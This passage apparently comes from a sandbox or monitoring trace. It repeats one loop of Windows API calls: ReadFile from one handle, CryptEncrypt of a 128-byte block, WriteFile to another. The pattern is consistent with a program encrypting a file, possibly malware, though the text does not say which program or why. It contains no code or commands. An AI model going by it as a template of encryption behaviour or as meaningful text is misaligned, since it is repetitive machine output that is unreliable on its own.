returned 1 [0045.424] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.424] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.424] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.424] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.425] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.425] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.425] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.425] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.425] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.425] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.425] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.425] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.425] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.425] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.425] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.425] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.425] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.426] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.426] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.426] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.426] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.426] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.426] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.426] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.426] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.426] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.426] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.426] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.426] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.426] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.426] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.427] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.427] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.427] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.427] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.427] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.427] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.427] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.427] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.427] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.427] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.427] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.427] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.427] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.427] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.428] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.428] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.428] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.428] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.428] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.428] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.428] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.428] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.428] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.428] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.428] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.428] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.428] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.428] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.429] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.429] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.429] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.429] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.429] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.429] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.429] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.429] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.429] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.429] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.429] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.429] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.430] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.430] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.430] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.430] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.430] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.430] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.430] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.430] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.430] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.430] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.430] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.430] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.430] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.430] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.431] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.431] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.431] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.431] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.431] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.431] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.431] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.431] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.431] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.431] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.431] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.431] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.431] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.432] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.432] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.432] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.432] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.432] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.432] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.432] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.432] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.432] 